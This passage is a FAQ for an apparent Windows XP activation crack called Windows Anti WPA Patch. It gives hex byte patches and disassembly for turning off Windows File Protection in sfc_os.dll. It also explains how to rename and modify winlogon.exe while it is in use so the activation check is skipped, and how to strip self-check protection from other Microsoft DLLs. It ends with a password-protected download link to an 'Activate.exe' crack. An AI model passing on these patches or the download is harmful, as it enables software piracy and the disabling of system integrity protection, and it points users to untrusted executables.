and (if nothing real bad happens) restored if it's finished.
????????????????????????????????????????????????????????????????????????????????
How to set another path to Winlogon.exe?
????????????????????????????????????????????????????????????????????????????????
Right click on the 'Apply/Browse' button.
If the Patch is already and the 'Apply/Browse' button is greyed out
Right click on the 'Quit' button to force unlock all buttons.
Note: You can also use the Windows Anti WPA Patch to de-protect
(Remove SelfCheckBlock SCB) from other protected
Microsoft exe and dll's:
For ex: licdll.dll, DPCDLL.dll or Windows PLUS! Pack Executables
Of course the WPA-Patch is skipped in this case.
????????????????????????????????????????????????????????????????????????????????
The Patch doesn't work after I rebooted, the WPA Reminder pops up again.
Also during the Patch the Windows Systemfile Protection Dialogbox didn't
come up.
????????????????????????????????????????????????????????????????????????????????
Maybe the Patch was undone by the Windows File Protection.
To check if the patch is still active start the Windows Anti WPA Patch again and check if it says 'Patch already applied'.
????????????????????????????????????????????????????????????????????????????????
How to disable this damn Windows File Protection(WFP)?
????????????????????????????????????????????????????????????????????????????????
There is no really official way to disable this
This is an undocumented setting worked for recent windows versions:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable=0xffffff9d
BUT: It was removed in Windows 2000 Service Pack 2 and in Windows XP!
When you restart your computer, the System event log will contain Event ID 64032, "Windows File Protection is not active on this system."
SFCDisable (REG_DWORD)
0 = enabled (default - WinXP Professional)
1 = disabled, prompt at boot to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
2 = disabled at next boot only, no prompt to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
4 = enabled, with popups disabled (default - for all Server Windows)
More about this and how to re-enable the 'SFCDisable=0xffffff9d-setting'
-> http://www.collakesoftware.com/aboutwfp.htm
To make this more flexible here is a search'n'replace patch:
(Rename sfc_os.dll to sfc_os.OUT; copy sfc_os.OUT to sfc_os.dll)
Open sfc_os.dll in a hex editor
Search for : 83 f8 9D 75 08 33 C0 40
Replace with: 83 f8 9D EB 08 33 C0 40
So this is where it comes from:
A1 D8E1C376 MOV EAX, [SFCDisable]
Patch- > 83F8 9D CMP EAX, -63 ; = 0xffffff9d !
Search > 75 08 JNZ SHORT Don't_Set_SFCDisable_=_1
Data > 33C0 XOR EAX, EAX
> 40 INC EAX
A3 D8E1C376 MOV [SFCDisable], EAX
:Don't_Set_SFCDisable
Btw this fragment is the reason 0xffffff9d don't work anymore - so alternatively Nop Out (=overwrite with 0x90) that bastard
Well I found a real simple way to disable this for sure:
Rename c:\WINDOWS\system32\sfc.dll to sfc-OUT.dll to something else
After Reboot the WFP is disabled.
BUT I advice to rename sfc-OUT.dll back to sfc.dll soon because I notice
that you can't install any new hardware device driver because syssetup.dll
statically imports sfc.dll and fail to load if sfc.dll is not found.
?????????????????????????????????????????????????????????????????????????????????????????????
The Patcher doesn?t find any offset. / Know problem on Asian systems.
?????????????????????????????????????????????????????????????????????????????????????????????
WPA_KILL.EXE currently don't work with Asian Systems (
enabled. If you have such systems disable DBCS or patch your winlogon.exe on a non DBCS system
apply the patch and copy it back in your system.
As far as I found out the Test Version function does not work properly and you get 'unknown Version'.
A Workaround that might work is to use the offset locator to detect/set the right offset manually.
(Hint: Compare the detected offset with the known-offset-list)
The problem is related to some improper char handling and/or comparing inside FrmMain.Test() i.e FileStream::FixedString()
Everyone how has an Asian System and MSOffice(Note: VBA is always also installed together with MSO) or Visual Basic 6 is welcome to invite me to a remote Session. - so I can examine and fix that problem - Please send me an email...
And of course you?re also welcome to fix it your self:
\other\cracknfo\problem-onasian-systems.rar
\SRC\antiwpa-1.6.2-winxp-2k3-src.zip
?????????????????????????????????????????????????????????????????????????????????????????????
How you access/modify the winlogon.exe file while the winlogon process is running ?
I only saw you are using standart API calls but I must have missed something...
???????????????????????????????????????????????????????????????????????????????????????????
How to modify a File (like winlogon.exe) while it is in use:
1.Rename winlogon.exe -> winlogon.bak
That's the most important thing about that. You can't delete or
modify a file that's in use, but you can RENAME it! (under Win9x
this don't work. But there you can rename the dir the file is in...)
2.Copy winlogon.bak -> winlogon.exe
3.Now you can edit winlogon.exe. Of course you can't delete (or
modify) winlogon.bak as long as it is in use.
But you surely want to keep an backup of it, don't you?
Oh I almost forgot to mention an other annoy thing:
>The Windows system File Protection (WFP) 'D:\installs\WinXP_SP2.out'
So the WFP won't file them to restore
Well the WPA-Patch doesn't rename your Windows installation path it deletes temporary the path to this in you registry and restores it after the patch (actually after you clicked on the OK button of the messagebox).
These Registry paths are:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath"= "D:\installs\WinXP_CD"
"ServicePackSourcePath" ="D:\installs\WinXP_SP2"
----------------------------------------------------------
Just a hint to see if the patch worked without to Reboot:
1.Apply the patch
2.Logon as an other user
(But don't log of - choose change/disconnect user)
3.When you login just see if the patch works...
... or if not this damn
'You haven't activated your Windows yet...' message
(4.If you logoff the first user now 'winlogon.bak' is no long in use
and you can delete/modify it)
Ah and to get a better overview about the processes which are running on your machine use this: http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
And next time you can't delete a files use 'search handle' and enter the filename then close the handle(=file) or kill the process...
?????????????????????????????????????????????????????????????????????????????????????????????
Does the AntiWPA Crack make winlogon.exe unstable?
?????????????????????????????????????????????????????????????????????????????????????????????
Since the WPA 1.6.2 disables all anti crack self checks in winlogon.exe it may execute some msec faster :)
The patch simply makes winlogon.exe to skip the function which will do the WPA-Check( update of WPA Trialcounter)
and block any login if the result is 'negative'.
From 'outside' this windows is simple not activated but as long your using a valid CDKEY Windows update will work and is not affected by the WPA-Patch
> does the patch make winlogon.exe unstable?
No. If it is applied correctly winlogon.exe will not become unstable/crash.
(The only time winlogon.exe becomes unstable is after appling wpa-kill 1.1 to WinXP SP1 - but this bug was fix in version 1.2...)
Of course with the wrong offset in offset locator you can make winlogon.exe unstable/crash or by killing the patcher during the patch is applied.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
I got 'ERROR: Unknown Version of winlogon.exe'.
Can you include this version in your WPA-Patcher ?
????????????????????????????????????????????????????????????????????????????????
Well please try the offset locator button to patch this new Version. Since Version 1.4 I added a heuristic search for offset locator which should find the right offset by default and highlight it.
So -after you read the warning- just double click on the highlight Offset on the List to set this as new patch-Offset.
If this is not a Beta or Release Candidate Version send me your -unpatched- Winlogon.exe by email and add if the default offset (found by the for offset locator) works.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
The patch don't work - if i click on the 'Activate Windows' link in the
start menu, it says Windows isn't activated and that there are only xx days left.
????????????????????????????????????????????????????????????????????????????????
This patch didn't stop the trial counter nor will it 'Activate' your Windows.
The WPA-Patch fixes the condition jump which decides whether windows was started in safe mode
and the activation check should be skipped or if it was started in normal mode and it should be done.
So in short it will make winlogon.exe to skip the is-Windows-activated check when you logon.
To see if the patch work wait about one minute after you logon -
if the Activation reminder balloon in the tray bar DON'T pop up - the patch IS working.
Some other things to see that it works
The messagebox that reminders you to active if there are only 5 days left and
The messagebox that says you're not allowed to logon until you active will be away.
So patching msobmain.dll just to make it say it's activated is only additional overheat and
also may cause some problems. Maybe if you want to change your CDKey and you don't reach the CDKEY change dialog because it says already activated...
Ok what I need to do is to include some FAQ-info text in the next version about that issue.
Maybe I will add a "Let's Activate Windows" force true patch if there is such a big need for this
I mean if this will make someone sleeps better at night - is enough for a good reason.
http:\\Antiwpa.cjb.net
XP Activation
Installation:
Run - "Activate.exe ". wait until the windows says:
"Already Activaded" or something... don't close it.
Now run - "Enable Updates.exe" Wait until it fixed.
Now close all Windows, and restart your PC
DOWNLOAD
http://rapidshare.com/files/16707564/x_h_by_kissme1.rar.html
PASSWORD : kissme1
Comments